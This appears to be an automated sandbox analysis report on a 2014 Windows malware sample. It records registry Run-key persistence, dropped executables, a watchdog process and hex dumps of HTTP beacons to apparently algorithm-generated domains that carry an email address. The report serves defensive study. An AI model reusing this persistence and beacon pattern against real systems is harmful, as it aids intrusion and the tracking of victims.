Analysis Date: 2014-09-19 04:07:46

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text — md5: e1ea0730348877b9d2342f3bbe445cf8 sha1: 268a889478af4c8cae040aedffa3fec36366c1a6 size: 298496
Section .rdata — md5: 1ccce4278c9700b5699b52493c9e1ec4 sha1: 25f90134d1395113938e7a6e80eb7aad536f97b7 size: 34304
Section [name not captured in extraction] — md5: 3224b537ca680234073a573dd835d7cd sha1: cb931ccbe94b1aa5c004841f376dd0983bc9552c size: 101376
Timestamp: 2014-07-24 05:35:11
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WinHTTP Protected Diagnostic ➝
C:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.exe

↳ C:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.ydqsr
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\zuzhhyvafzai.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP: 192.168.1.1:1031 ➝
Flows TCP: 192.168.1.1:1032 ➝
Flows TCP: 192.168.1.1:1033 ➝
Flows TCP: 192.168.1.1:1034 ➝
Flows TCP: 192.168.1.1:1035 ➝
Flows TCP: 192.168.1.1:1036 ➝
Flows TCP: 192.168.1.1:1037 ➝
Flows TCP: 192.168.1.1:1038 ➝
Flows TCP: 192.168.1.1:1039 ➝
Flows TCP: 192.168.1.1:1040 ➝
Flows TCP: 192.168.1.1:1041 ➝

Raw Pcap (the HTTP requests below share the same request line and headers and differ mainly in the Host header)
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207468 696e6b62   se..Host: thinkb
0x00000070 (00112)   65796f6e 642e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207072 6573656e   se..Host: presen
0x00000070 (00112)   74626569 6e672e6e 65740d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206368 69656662   se..Host: chiefb
0x00000070 (00112)   65696e67 2e6e6574 0d0a0d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207477 656c7665   se..Host: twelve
0x00000070 (00112)   666f7265 7665722e 6e65740d 0a0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206869 73746f72   se..Host: histor
0x00000070 (00112)   79666f72 65766572 2e6e6574 0d0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207765 61746865   se..Host: weathe
0x00000070 (00112)   72666f72 65766572 2e6e6574 0d0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636c 61737362   se..Host: classb
0x00000070 (00112)   65796f6e 642e6e65 740d0a0d 0a0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207468 696e6b66   se..Host: thinkf
0x00000070 (00112)   6c6f7765 722e6e65 740d0a0d 0a0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207072 6573656e   se..Host: presen
0x00000070 (00112)   74666c6f 7765722e 6e65740d 0a0d0a0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636f 6c6c6567   se..Host: colleg
0x00000070 (00112)   65636f72 6e65722e 6e65740d 0a0d0a0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206f66 74656e66   se..Host: oftenf
0x00000070 (00112)   6c6f7765 722e6e65 740d0a0d 0a0d0a0a
0x00000080 (00128)                                         

00-+ CC
         (((((                  H
         h((((                  H
